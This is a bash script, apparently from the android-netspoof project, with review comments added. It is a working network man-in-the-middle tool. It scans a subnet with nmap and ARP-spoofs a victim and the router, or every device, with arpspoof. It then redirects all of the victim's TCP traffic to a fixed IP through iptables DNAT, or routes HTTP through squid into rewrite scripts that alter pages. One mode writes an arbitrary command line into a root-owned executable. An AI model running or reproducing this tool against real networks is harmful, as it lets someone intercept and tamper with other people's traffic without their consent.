~w-shackleton/android-netspoof/debimg-trunk

#!/bin/bash

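# Interface to operate on. WLAN, IP, SUBNET, MASK and SHORTMASK can each be
# preset in the environment; only the ones left empty are detected below.
: "${WLAN:=eth0}"
# WLAN=eth0

# Detect a few settings

# Address and mask are scraped from the legacy net-tools ifconfig layout
# ("inet addr:... Mask:...").
# NOTE(review): ifconfig builds that print "inet <addr>  netmask <mask>" will
# leave IP and MASK empty here - confirm against the image this runs in.
# $WLAN is quoted everywhere so an unusual interface name cannot be split into
# extra arguments.
[ -z "$IP" ] && IP=$(ifconfig "$WLAN" | grep "inet addr" | sed 's/[^:]*:\([^ ]*\) .*/\1/')
echo "Current Wifi IP: $IP"

# First column of the first routing-table line that mentions the interface.
[ -z "$SUBNET" ] && SUBNET=$(route -n | grep -- "$WLAN" | awk '{print $1}' | head -n1)
echo "Current subnet: $SUBNET"

[ -z "$MASK" ] && MASK=$(ifconfig "$WLAN" | grep Mask | sed 's/.*Mask:\([^ ]*\)/\1/')
echo "Subnet mask: $MASK"

# Prefix length handed to the host listing. Only three masks are recognised;
# anything else, including a failed detection, is treated as a /24.
# NOTE(review): 255.255.255.255 is a /32, yet it maps to 31 here - kept as the
# author wrote it; confirm whether that is intentional.
if [ -z "$SHORTMASK" ]
then
	case "$MASK" in
		255.255.255.255) SHORTMASK=31 ;;
		255.255.0.0) SHORTMASK=16 ;;
		255.0.0.0) SHORTMASK=8 ;;
		*) SHORTMASK=24 ;;
	esac
fi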

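# Argument-count gate. Fewer than three arguments never starts anything: the
# script prints help for the next missing argument and exits.
case "$#" in
	0)
		# Help text plus a ping scan of the detected range. The scan only lists
		# hosts that answer; nothing on the network is modified in this path.
		echo "Listing hosts on subnet"
		echo "To actually run a spoof, first specify the IP addresses of the victim and the router as arguments."
		echo "Eg. $0 192.168.1.105 192.168.1.1"
		# The value the script actually tests for is the literal word "all";
		# the help text used to advertise '*', which is not recognised.
		echo "To run for all devices, use 'all' as the first argument."
		echo " "
		echo "NOTE: The list below sometimes doesn't actually show anything for some reason."
		# Quoted as one word so an empty or odd SUBNET cannot turn into extra
		# nmap arguments.
		nmap -sP "$SUBNET/$SHORTMASK" | grep "appears to be up"
		# Bare exit: the status is that of the pipeline above (grep's).
		exit
		;;
	1)
		echo "Please specify router & pc as arguments"
		exit 1
		;;
	2)
		echo "Modes available:"
		echo "	0 - Arpspoof only"
		echo "	1 - redirect to ip address (next arg)"
		echo "	2 - Transform script mode (default is Upside down mode)"
		echo "	3 - Transform script multi mode (specify shell script chaining as arg)"
		exit 1
		;;
esac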

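# Mode selector and its optional argument. What OPT1 means depends on the mode:
# a destination address for mode 1, a file name under /rewriters for mode 2,
# and a shell command line for mode 3.
# Defaults are chosen by testing OPT1 itself rather than the argument count, so
# an explicitly empty fourth argument gets the default too instead of reaching
# iptables or ln as an empty string.
MODE="$3"
OPT1="$4"
case "$MODE" in
	"0")
		;;
	"1")
		if [ -z "$OPT1" ]
		then
			echo "No IP specified - using kittenwar"
			OPT1="205.196.209.62"
		fi
		;;
	"2")
		if [ -z "$OPT1" ]
		then
			echo "No script in /rewriters specified, using flip.pl"
			echo "Specify a script after the option number to use a custom one."
			echo "NOTE: A script that does not exist in /rewriters is rejected."
			OPT1="flip.pl"
		fi
		# The name is later joined onto /rewriters/ and linked to
		# /usr/local/bin/rewrite by a script that runs as root. Refuse ".."
		# components so the link cannot point outside /rewriters, and refuse a
		# missing file here, before any spoofing or firewall change has started,
		# instead of leaving a dangling link behind.
		case "$OPT1" in
			..|../*|*/..|*/../*)
				echo "Rewriter script must be inside /rewriters"
				exit 1
				;;
		esac
		if [ ! -f "/rewriters/$OPT1" ]
		then
			echo "No such rewriter script: /rewriters/$OPT1"
			exit 1
		fi
		;;
	"3")
		if [ -z "$OPT1" ]
		then
			echo "No scripts in /rewriters specified, using flip.pl"
			OPT1="/rewriters/flip.pl"
		fi
		;;
	* )
		echo "Please specify a valid option"
		exit 1
		;;
esac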


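# PIDs of the background arpspoof jobs. Cleared first so that the kill at
# shutdown can only ever see a PID recorded here, never a value inherited from
# the caller's environment.
ARP1=""
ARP2=""

# $1 selects the scope: "all", "none", or a single address paired with $2.
# Only stdout of arpspoof is discarded; its stderr still reaches the caller.
case "$1" in
	all)
		echo "Starting ARP Spoofing for all devices"
		arpspoof -i "$WLAN" "$2" > /dev/null &
		ARP1="$!"
		;;
	none)
		echo "Not arpspoofing at all."
		;;
	*)
		# One job per direction between the two addresses.
		echo "Starting ARP Spoofing"
		arpspoof -i "$WLAN" -t "$1" "$2" > /dev/null &
		ARP1="$!"
		arpspoof -i "$WLAN" -t "$2" "$1" > /dev/null &
		ARP2="$!"
		;;
esac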

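# Policy the FORWARD chain had before modes 2 and 3 switch it to ACCEPT, kept
# so that shutdown can put it back. Empty means "not captured, leave alone".
PREV_FORWARD_POLICY=""

# Shared setup for modes 2 and 3: start the proxy and web server, then divert
# forwarded HTTP into the local proxy port. Only TCP port 80 is diverted; all
# other forwarded traffic is masqueraded and passed on unchanged.
start_http_redirect() {
	/etc/init.d/squid start
	/etc/init.d/lighttpd start
	# "iptables -S FORWARD" prints the policy as its "-P FORWARD <policy>" line.
	PREV_FORWARD_POLICY=$(iptables -S FORWARD 2>/dev/null | awk '$1 == "-P" { print $3; exit }')
	iptables -P FORWARD ACCEPT # Android 4.0 requires this
	iptables -t nat -A POSTROUTING -j MASQUERADE
	# 3128 is presumably the port squid listens on - confirm in squid.conf.
	iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
}

# Undo everything this run changed: stop the arpspoof jobs, delete the NAT
# rules that were appended, restore the FORWARD policy, stop the services.
# Runs on the normal path and, through the traps below, when the script is
# interrupted, so firewall rules and services are not left behind.
stop_spoof() {
	# Clear the traps first so the function cannot run a second time.
	trap - EXIT HUP INT TERM

	# Skip the kill entirely when no PID was recorded (mode "none", or ARP2 in
	# mode "all").
	[ -n "${ARP1:-}" ] && kill "$ARP1" 2>/dev/null
	[ -n "${ARP2:-}" ] && kill "$ARP2" 2>/dev/null

	# Stop stuff
	case "$MODE" in
		"1")
			echo "Unsetting iptables"
			iptables -t nat -D PREROUTING -p tcp -j DNAT --to-destination "$OPT1"
			;;
		"2"|"3")
			iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
			iptables -t nat -D POSTROUTING -j MASQUERADE
			[ -n "$PREV_FORWARD_POLICY" ] && iptables -P FORWARD "$PREV_FORWARD_POLICY"
			/etc/init.d/squid stop
			/etc/init.d/lighttpd stop
			# External helper, not defined in this file.
			# NOTE(review): whether it removes /usr/local/bin/rewrite is not
			# visible from here - confirm, otherwise the mode 3 wrapper stays on
			# disk after shutdown.
			spoof-clean
			;;
	esac

	# Let the background arpspoof jobs finish exiting before the script ends.
	wait
}

# Installed before any rule is added, so an interrupt during setup or while
# waiting still reaches the cleanup.
trap stop_spoof EXIT
trap 'exit 1' HUP INT TERM

case "$MODE" in
	"1")
		# Every TCP connection arriving at this host for forwarding is rewritten
		# to the single destination in OPT1.
		echo "Setting iptables"
		iptables -t nat -A PREROUTING -p tcp -j DNAT --to-destination "$OPT1"
		;;
	"2")
		# /usr/local/bin/rewrite is presumably the rewrite helper squid is
		# configured to call - confirm in squid.conf.
		rm -f /usr/local/bin/rewrite
		ln -s "/rewriters/$OPT1" /usr/local/bin/rewrite
		start_http_redirect
		;;
	"3")
		rm -f /usr/local/bin/rewrite
		# I'm So Meta, Even This Acronym
		# NOTE(review): the fourth argument becomes, verbatim and unvalidated,
		# the body of a world-executable script written by root. It must only
		# ever come from the operator, never from network-derived data.
		# printf instead of echo so a value starting with "-n" or "-e", or
		# containing backslashes, is written exactly as given.
		printf '%s\n' '#!/bin/sh' "$OPT1" > /usr/local/bin/rewrite
		chmod a+x /usr/local/bin/rewrite
		start_http_redirect
		;;
esac

# Wait for finish
read -r

stop_spoof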